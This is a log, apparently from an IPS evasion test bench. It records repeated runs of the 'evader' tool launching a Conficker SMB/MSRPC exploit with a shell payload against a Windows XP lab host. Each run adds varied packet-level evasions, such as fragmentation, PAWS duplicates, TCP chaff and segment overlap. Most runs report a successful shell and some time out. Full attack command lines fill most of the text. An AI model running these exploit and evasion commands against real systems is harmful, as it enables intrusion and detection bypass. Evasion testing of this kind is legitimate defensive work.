- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=54267 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=7y0JaWVYTKY --evasion=[start,smb_opentree]ipv4_opt,"13","inc","random_alphanum" --evasion=[smb_connect,end]tcp_paws,"5","124871207","alpharandomized" --verifydelay=1000 --payload=shell
- Info: Using random seed 7y0JaWVYTKb
- The following evasions are applied from stage start to smb_opentree:
- - Every 13th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
- The duplicate packet has random alphanumeric bytes as payload
- The following evasions are applied from stage smb_connect to end:
- - Every 5th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 124871207> and has original payload with alphabetic bytes randomized
- Info: NetBIOS connection 10.62.90.111:54267 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- ............
- 1836 runs averaging 1.90 runs / second ; progress: 966/43200.........
- 1845 runs averaging 1.90 runs / second ; progress: 971/43200...............
- 1860 runs averaging 1.91 runs / second ; progress: 976/43200..2015-06-07 23:35:46 INFO
- Success. (10.62.90.116):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=53810 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=l+IKIQ4Qqwk --evasion=[msrpc_bind,end]tcp_chaff,"3","nullflag|shorthdr","alpharandomized" --evasion=[smb_connect,end]tcp_paws,"50%","268435455","alpharandomized" --verifydelay=1000 --payload=shell
- Info: Using random seed l+IKIQ4Qqwm
- The following evasions are applied from stage smb_connect to end:
- - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435455> and has original payload with alphabetic bytes randomized
- The following evasions are applied from stage msrpc_bind to end:
- - With every 3rd TCP packet a TCP chaff packet is sent. The chaff packet has:
- * NULL TCP control flags.
- * TCP header shorter than 20 bytes
- * Duplicate packet has original payload with alphabetic bytes randomized
- Info: NetBIOS connection 10.62.90.116:53810 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ...............
- 1878 runs averaging 1.91 runs / second ; progress: 981/43200..2015-06-07 23:35:52 INFO
- Success. (10.62.90.111):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=37059 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=p48gpM55008 --evasion=[netbios_connect,end]tcp_paws,"50%","70435613","random_alphanum" --evasion=[netbios_connect,smb_connect]tcp_tsoptreply,"le" --verifydelay=1000 --payload=shell
- Info: Using random seed p48gpM5500+
- The following evasions are applied from stage netbios_connect to end:
- - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 70435613> and has random alphanumeric bytes as payload
- The following evasions are applied from stage netbios_connect to smb_connect:
- - TCP timestamps echo reply value is sent in the wrong endianness
- Info: NetBIOS connection 10.62.90.111:37059 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ........
- 1889 runs averaging 1.92 runs / second ; progress: 986/43200..........
- 1899 runs averaging 1.92 runs / second ; progress: 991/43200.....
- 1904 runs averaging 1.91 runs / second ; progress: 996/43200.......
- 1911 runs averaging 1.91 runs / second ; progress: 1001/43200......Pid 7942 timed out - killed
- 2015-06-07 23:36:14 INFO
- Timed out (10.62.90.119):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=38370 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=d/0qmv/Fmbo --evasion=[start,msrpc_req]ipv4_frag,"24" --evasion=[smb_openpipe,msrpc_req]tcp_urgent,"1","random" --verifydelay=1000 --payload=shell
- Info: Using random seed d/0qmv/Fmbp
- The following evasions are applied from stage start to msrpc_req:
- - IPv4 fragments with at most 24 bytes per fragment
- The following evasions are applied from stage smb_openpipe to msrpc_req:
- - Add a random urgent data byte to every 1 TCP segment.
- Info: NetBIOS connection 10.62.90.119:38370 -> 10.35.1.207:445
- Terminated
- ......
- 1924 runs averaging 1.91 runs / second ; progress: 1006/43200............
- 1936 runs averaging 1.91 runs / second ; progress: 1011/43200....................
- 1956 runs averaging 1.92 runs / second ; progress: 1016/43200................
- 1972 runs averaging 1.93 runs / second ; progress: 1021/43200.....
- 1977 runs averaging 1.93 runs / second ; progress: 1026/43200
- 1977 runs averaging 1.92 runs / second ; progress: 1031/43200.......
- 1984 runs averaging 1.91 runs / second ; progress: 1036/43200.........2015-06-07 23:36:50 INFO
- Success. (10.62.90.112):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=16837 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=t66PqlwjdXo --evasion=[smb_openpipe,msrpc_bind]netbios_chaff,"75%","http_get|http_post|msrpc_req|broken_length" --evasion=[smb_opentree,msrpc_req]smb_decoytrees,"5","4","3","random_msrpcreq" --evasion=[smb_opentree,smb_openpipe]tcp_overlap,"1479","new","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed t66PqlwjdXq
- The following evasions are applied from stage smb_opentree to smb_openpipe:
- - TCP segments are set to overlap by 1479 bytes, with the later packet containing the correct payload. Overlapping part has random alphanumeric bytes as payload
- The following evasions are applied from stage smb_opentree to msrpc_req:
- - Before normal SMB writes, 5 SMB trees are opened and 4 writes are performed to them. The write payload is 3 bytes of MSRPC request-like data.
- The following evasions are applied from stage smb_openpipe to msrpc_bind:
- - 75% probability to send a chaff NetBIOS message before an actual NetBIOS message. The chaff message is an unspecified NetBIOS message with HTTP GET request like payload. The chaff message is an unspecified NetBIOS message with HTTP POST request like payload. The chaff message is an unspecified NetBIOS message with MSRPC request like payload. The chaff message is an unspecified NetBIOS message with a small payload and an invalid length value.
- Info: NetBIOS connection 10.62.90.112:16837 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- ......Pid 8470 timed out - killed
- 2015-06-07 23:36:51 INFO
- Timed out (10.62.90.114):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=28648 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=rzrWoJOMQXg --evasion=[netbios_connect,end]ipv4_opt,"13","inc","alpharandomized" --evasion=[start,msrpc_req]tcp_chaff,"50%","nullflag|shorthdr","alphanumrandomized" --evasion=[smb_opentree,msrpc_bind]tcp_urgent,"2","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed rzrWoJOMQXi
- The following evasions are applied from stage start to msrpc_req:
- - 50% probability to send TCP chaff when sending a TCP packet. The chaff packet has:
- * NULL TCP control flags.
- * TCP header shorter than 20 bytes
- * Duplicate packet has original payload with alphanumeric bytes randomized
- The following evasions are applied from stage netbios_connect to end:
- - Every 13th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
- The duplicate packet has identical payload except that alphabetic characters are randomized
- The following evasions are applied from stage smb_opentree to msrpc_bind:
- - Add a random alphaurgent data byte to every 2 TCP segment.
- Info: NetBIOS connection 10.62.90.114:28648 -> 10.35.1.207:445
- Terminated
- .
- 2002 runs averaging 1.92 runs / second ; progress: 1042/43200.........................
- 2027 runs averaging 1.94 runs / second ; progress: 1047/43200.....................
- 2048 runs averaging 1.95 runs / second ; progress: 1052/43200...............
- 2063 runs averaging 1.95 runs / second ; progress: 1057/43200.2015-06-07 23:37:07 INFO
- Success. (10.62.90.112):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=57745 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=bYq5ipjquv8 --evasion=[smb_opentree,end]tcp_overlap,"6","new","random" --evasion=[netbios_connect,msrpc_req]tcp_paws,"75%","112523422","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed bYq5ipjquv9
- The following evasions are applied from stage netbios_connect to msrpc_req:
- - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 112523422> and has random alpha bytes as payload
- The following evasions are applied from stage smb_opentree to end:
- - TCP segments are set to overlap by 6 bytes, with the later packet containing the correct payload. Overlapping part has random bytes as payload
- Info: NetBIOS connection 10.62.90.112:57745 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- ........
- 2073 runs averaging 1.95 runs / second ; progress: 1062/43200...
- 2076 runs averaging 1.95 runs / second ; progress: 1067/43200...Pid 8907 timed out - killed
- 2015-06-07 23:37:18 INFO
- Timed out (10.62.90.115):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=21523 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=q/iYCznwOBM --evasion=[netbios_connect,msrpc_req]ipv4_frag,"352" --evasion=[smb_opentree,end]tcp_urgent,"2","zero" --verifydelay=1000 --payload=shell
- Info: Using random seed q/iYCznwOBO
- The following evasions are applied from stage netbios_connect to msrpc_req:
- - IPv4 fragments with at most 352 bytes per fragment
- The following evasions are applied from stage smb_opentree to end:
- - Add a zero urgent data byte to every 2 TCP segment.
- Info: NetBIOS connection 10.62.90.115:21523 -> 10.35.1.207:445
- Terminated
- ........
- 2088 runs averaging 1.95 runs / second ; progress: 1072/43200.................
- 2105 runs averaging 1.95 runs / second ; progress: 1077/43200..2015-06-07 23:37:28 INFO
- Success. (10.62.90.112):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=39608 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=kCPetdTqU9U --evasion=[netbios_connect,msrpc_req]tcp_chaff,"13","nullchksum|nullflag|shorthdr","random" --evasion=[smb_opentree,end]tcp_paws,"3","8","random_alpha" --evasion=[smb_connect,smb_openpipe]tcp_segvar,"9","54646" --verifydelay=1000 --payload=shell
- Info: Using random seed kCPetdTqU9W
- The following evasions are applied from stage netbios_connect to msrpc_req:
- - With every 13 TCP packet a TCP chaff packet is sent. The chaff packet has:
- * NULL TCP checksum.
- * NULL TCP control flags.
- * TCP header shorter than 20 bytes
- * Duplicate packet has random bytes as payload
- The following evasions are applied from stage smb_connect to smb_openpipe:
- - TCP packets are segmented to contain between 9 and 54646 bytes of payload.
- The following evasions are applied from stage smb_opentree to end:
- - Every 3th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 8> and has random alpha bytes as payload
- Info: NetBIOS connection 10.62.90.112:39608 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ................
- 2124 runs averaging 1.96 runs / second ; progress: 1082/43200.......................
- 2148 runs averaging 1.98 runs / second ; progress: 1087/43200..............Pid 9118 timed out - killed
- 2015-06-07 23:37:41 INFO
- Timed out (10.62.90.113):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=42217 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=aB2TLnwEBs0 --evasion=[netbios_connect,smb_openpipe]tcp_paws,"75%","35527006","random" --evasion=[smb_opentree,msrpc_bind]tcp_paws,"1","6","shuffle30" --verifydelay=1000 --payload=shell
- Info: Using random seed aB2TLnwEBs1
- The following evasions are applied from stage netbios_connect to smb_openpipe:
- - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 35527006> and has random bytes as payload
- The following evasions are applied from stage smb_opentree to msrpc_bind:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 6> and has 30 bytes of original payload, then shuffled original payload
- Info: NetBIOS connection 10.62.90.113:42217 -> 10.35.1.207:445
- Terminated
- ..
- 2164 runs averaging 1.98 runs / second ; progress: 1092/43200..................
- 2182 runs averaging 1.99 runs / second ; progress: 1097/43200................
- 2198 runs averaging 1.99 runs / second ; progress: 1102/43200.........2015-06-07 23:37:56 INFO
- Success. (10.62.90.119):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=40371 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=fn25dE4h1gs --evasion=[start,smb_opentree]ipv4_frag,"1440" --evasion=[smb_connect,smb_openpipe]ipv4_order,"rev" --evasion=[smb_openpipe,msrpc_req]tcp_paws,"1","163937280","zero" --verifydelay=1000 --payload=shell
- Info: Using random seed fn25dE4h1gt
- The following evasions are applied from stage start to smb_opentree:
- - IPv4 fragments with at most 1440 bytes per fragment
- The following evasions are applied from stage smb_connect to smb_openpipe:
- - IPv4 fragments are sent in a reverse order
- The following evasions are applied from stage smb_openpipe to msrpc_req:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 163937280> and has 0x00 bytes as payload
- Info: NetBIOS connection 10.62.90.119:40371 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- .
- 2209 runs averaging 2.00 runs / second ; progress: 1107/43200.........
- 2218 runs averaging 1.99 runs / second ; progress: 1112/43200................
- 2234 runs averaging 2.00 runs / second ; progress: 1117/43200................
- 2250 runs averaging 2.01 runs / second ; progress: 1122/43200.......2015-06-07 23:38:15 INFO
- Success. (10.62.90.110):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=14671 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=eos8HvXZetA --evasion=[smb_connect,msrpc_req]smb_decoytrees,"4","3","10","random" --evasion=[start,msrpc_req]tcp_paws,"1","43471621","alphanumrandomized" --evasion=[smb_opentree,smb_openpipe]tcp_paws,"50%","7","alpharandomized" --verifydelay=1000 --payload=shell
- Info: Using random seed eos8HvXZetB
- The following evasions are applied from stage start to msrpc_req:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 43471621> and has original payload with alphanumeric bytes randomized
- The following evasions are applied from stage smb_connect to msrpc_req:
- - Before normal SMB writes, 4 SMB trees are opened and 3 writes are performed to them. The write payload is 10 random bytes.
- The following evasions are applied from stage smb_opentree to smb_openpipe:
- - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 7> and has original payload with alphabetic bytes randomized
- Info: NetBIOS connection 10.62.90.110:14671 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- ..
- 2260 runs averaging 2.01 runs / second ; progress: 1127/43200........
- 2268 runs averaging 2.00 runs / second ; progress: 1132/43200.............
- 2281 runs averaging 2.01 runs / second ; progress: 1137/43200........2015-06-07 23:38:29 INFO
- Success. (10.62.90.112):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=64670 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=nUqmYkZuLXg --evasion=[msrpc_req,end]smb_decoytrees,"6","3","2","random_msrpcreq" --evasion=[netbios_connect,smb_connect]tcp_urgent,"50%","zero" --verifydelay=1000 --payload=shell
- Info: Using random seed nUqmYkZuLXi
- The following evasions are applied from stage netbios_connect to smb_connect:
- - 50% probability to add a zero urgent data byte to a TCP segment.
- The following evasions are applied from stage msrpc_req to end:
- - Before normal SMB writes, 6 SMB trees are opened and 3 writes are performed to them. The write payload is 2 bytes of MSRPC request-like data.
- Info: NetBIOS connection 10.62.90.112:64670 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Command shell connection reset.
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Shell closed
- 0: Success.
- ..............
- 2304 runs averaging 2.02 runs / second ; progress: 1142/43200..................
- 2322 runs averaging 2.02 runs / second ; progress: 1147/43200........Pid 9675 timed out - killed
- 2015-06-07 23:38:41 INFO
- Timed out (10.62.90.117):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=38925 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=yG4ULddpIlQ --evasion=[netbios_connect,msrpc_req]tcp_chaff,"50%","nullflag|outofwindow|shorthdr","shuffle" --evasion=[smb_connect,msrpc_bind]tcp_paws,"13","1","alphanumrandomized" --evasion=[smb_opentree,end]tcp_urgent,"25%","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed yG4ULddpIlT
- The following evasions are applied from stage netbios_connect to msrpc_req:
- - 50% probability to send TCP chaff when sending a TCP packet. The chaff packet has:
- * NULL TCP control flags.
- * An out-of-window sequence number.
- * TCP header shorter than 20 bytes
- * Duplicate packet has shuffled original payload
- The following evasions are applied from stage smb_connect to msrpc_bind:
- - Every 13th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 1> and has original payload with alphanumeric bytes randomized
- The following evasions are applied from stage smb_opentree to end:
- - 25% probability to add a random alphanumeric urgent data byte to a TCP segment.
- Info: NetBIOS connection 10.62.90.117:38925 -> 10.35.1.207:445
- Terminated
- ...
- 2334 runs averaging 2.03 runs / second ; progress: 1152/43200..................
- 2352 runs averaging 2.03 runs / second ; progress: 1157/43200.....................
- 2373 runs averaging 2.04 runs / second ; progress: 1162/43200.......2015-06-07 23:38:55 INFO
- Success. (10.62.90.113):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=36257 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=5grPrOpE19A --evasion=[smb_openpipe,end]ipv4_opt,"25%","inc","zero" --evasion=[start,end]tcp_paws,"3","8","random" --verifydelay=1000 --payload=shell
- Info: Using random seed 5grPrOpE19D
- - Every 3th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 8> and has random bytes as payload
- The following evasions are applied from stage smb_openpipe to end:
- - 25% probability to send a duplicate IPv4 packet with an incrementing DWORD in the options field.
- The duplicate packet has NULL bytes for payload
- Info: NetBIOS connection 10.62.90.113:36257 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- ..........
- 2391 runs averaging 2.05 runs / second ; progress: 1167/43200................
- 2407 runs averaging 2.05 runs / second ; progress: 1172/43200.............
- 2420 runs averaging 2.06 runs / second ; progress: 1178/43200.....
- 2425 runs averaging 2.05 runs / second ; progress: 1183/43200.
- 2426 runs averaging 2.04 runs / second ; progress: 1188/43200........
- 2434 runs averaging 2.04 runs / second ; progress: 1193/43200...............
- 2449 runs averaging 2.04 runs / second ; progress: 1198/43200...................
- 2468 runs averaging 2.05 runs / second ; progress: 1203/43200.....
- 2473 runs averaging 2.05 runs / second ; progress: 1208/43200....
- 2477 runs averaging 2.04 runs / second ; progress: 1213/43200....
- 2481 runs averaging 2.04 runs / second ; progress: 1218/43200.............
- 2494 runs averaging 2.04 runs / second ; progress: 1223/43200.......
- 2501 runs averaging 2.04 runs / second ; progress: 1228/43200.....
- 2506 runs averaging 2.03 runs / second ; progress: 1233/43200.........
- 2515 runs averaging 2.03 runs / second ; progress: 1238/43200...............
- 2530 runs averaging 2.04 runs / second ; progress: 1243/43200.............
- 2543 runs averaging 2.04 runs / second ; progress: 1248/43200...........
- 2554 runs averaging 2.04 runs / second ; progress: 1253/43200.........
- 2563 runs averaging 2.04 runs / second ; progress: 1258/43200.....
- 2568 runs averaging 2.03 runs / second ; progress: 1263/43200.....
- 2573 runs averaging 2.03 runs / second ; progress: 1268/43200............
- 2585 runs averaging 2.03 runs / second ; progress: 1273/43200........
- 2593 runs averaging 2.03 runs / second ; progress: 1278/43200...Pid 12315 timed out - killed
- 2015-06-07 23:40:49 INFO
- Timed out (10.62.90.118):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=10694 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=BVbxr7AH3E8 --evasion=[smb_openpipe,msrpc_bind]tcp_paws,"75%","1","random" --evasion=[smb_connect,smb_opentree]tcp_urgent,"5","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed BVbxr7AH3E8
- The following evasions are applied from stage smb_connect to smb_opentree:
- - Add a random alphanumeric urgent data byte to every 5 TCP segment.
- The following evasions are applied from stage smb_openpipe to msrpc_bind:
- - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 1> and has random bytes as payload
- Info: NetBIOS connection 10.62.90.118:10694 -> 10.35.1.207:445
- Terminated
- ...........
- 2608 runs averaging 2.03 runs / second ; progress: 1283/43200........
- 2616 runs averaging 2.03 runs / second ; progress: 1288/43200..........
- 2626 runs averaging 2.03 runs / second ; progress: 1293/43200...........
- 2637 runs averaging 2.03 runs / second ; progress: 1298/432002015-06-07 23:41:08 INFO
- Success. (10.62.90.119):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=45516 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=b8YdQvqqZmM --evasion=[msrpc_bind,end]ipv4_frag,"336" --evasion=[smb_connect,end]ipv4_order,"lastfirst" --evasion=[smb_opentree,smb_openpipe]tcp_paws,"1","8","shuffle30" --verifydelay=1000 --payload=shell
- Info: Using random seed b8YdQvqqZmN
- The following evasions are applied from stage smb_connect to end:
- - IPv4 fragments are sent in correct order except that the last fragment comes first
- The following evasions are applied from stage smb_opentree to smb_openpipe:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 8> and has 30 bytes of original payload, then shuffled original payload
- The following evasions are applied from stage msrpc_bind to end:
- - IPv4 fragments with at most 336 bytes per fragment
- Info: NetBIOS connection 10.62.90.119:45516 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ............
- 2650 runs averaging 2.03 runs / second ; progress: 1303/43200..............
- 2664 runs averaging 2.04 runs / second ; progress: 1308/43200....Pid 12868 timed out - killed
- 2015-06-07 23:41:19 INFO
- Timed out (10.62.90.116):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=40689 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=G4pa7GZ55rE --evasion=[netbios_connect,msrpc_bind]tcp_paws,"21","17100606","alpharandomized" --evasion=[smb_openpipe,msrpc_req]tcp_urgent,"1","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed G4pa7GZ55rE
- The following evasions are applied from stage netbios_connect to msrpc_bind:
- - Every 21th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 17100606> and has original payload with alphabetic bytes randomized
- The following evasions are applied from stage smb_openpipe to msrpc_req:
- - Add a random alphaurgent data byte to every 1 TCP segment.
- Info: NetBIOS connection 10.62.90.116:40689 -> 10.35.1.207:445
- Terminated
- .....................
- 2690 runs averaging 2.05 runs / second ; progress: 1313/43200............................
- 2718 runs averaging 2.06 runs / second ; progress: 1318/43200.....................
- 2739 runs averaging 2.07 runs / second ; progress: 1323/43200............
- 2751 runs averaging 2.07 runs / second ; progress: 1328/43200..........
- 2761 runs averaging 2.07 runs / second ; progress: 1333/43200...........
- 2772 runs averaging 2.07 runs / second ; progress: 1338/43200........
- 2780 runs averaging 2.07 runs / second ; progress: 1344/43200.......
- 2787 runs averaging 2.07 runs / second ; progress: 1349/43200....2015-06-07 23:42:02 INFO
- Success. (10.62.90.116):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=42180 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=mvJYiHN4XVQ --evasion=[start,msrpc_bind]ipv4_opt,"21","inc","random_alphanum" --evasion=[start,end]tcp_paws,"50%","43541637","random_alphanum" --evasion=[netbios_connect,msrpc_req]tcp_tsoptreply,"le" --verifydelay=1000 --payload=shell
- Info: Using random seed mvJYiHN4XVS
- - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 43541637> and has random alphanumeric bytes as payload
- The following evasions are applied from stage start to msrpc_bind:
- - Every 21th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
- The duplicate packet has random alphanumeric bytes as payload
- The following evasions are applied from stage netbios_connect to msrpc_req:
- - TCP timestamps echo reply value is sent in the wrong endianness
- Info: NetBIOS connection 10.62.90.116:42180 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- ...
- 2795 runs averaging 2.06 runs / second ; progress: 1354/43200..........
- 2805 runs averaging 2.06 runs / second ; progress: 1359/43200.............
- 2818 runs averaging 2.07 runs / second ; progress: 1364/43200.........2015-06-07 23:42:15 INFO
- Success. (10.62.90.119):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=29827 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=rSQh8xLHN/Y --evasion=[smb_opentree,msrpc_bind]ipv4_opt,"1","inc","alpharandomized" --evasion=[netbios_connect,msrpc_req]tcp_paws,"25%","67977854","alphanumrandomized" --verifydelay=1000 --payload=shell
- Info: Using random seed rSQh8xLHN/a
- The following evasions are applied from stage netbios_connect to msrpc_req:
- - 25% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 67977854> and has original payload with alphanumeric bytes randomized
- The following evasions are applied from stage smb_opentree to msrpc_bind:
- - Every 1th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
- The duplicate packet has identical payload except that alphabetic characters are randomized
- Info: NetBIOS connection 10.62.90.119:29827 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Command shell connection reset.
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Shell closed
- 0: Success.
- ......
- 2834 runs averaging 2.07 runs / second ; progress: 1369/43200...............
- 2849 runs averaging 2.07 runs / second ; progress: 1374/43200...Pid 14369 timed out - killed
- 2015-06-07 23:42:26 INFO
- Timed out (10.62.90.114):
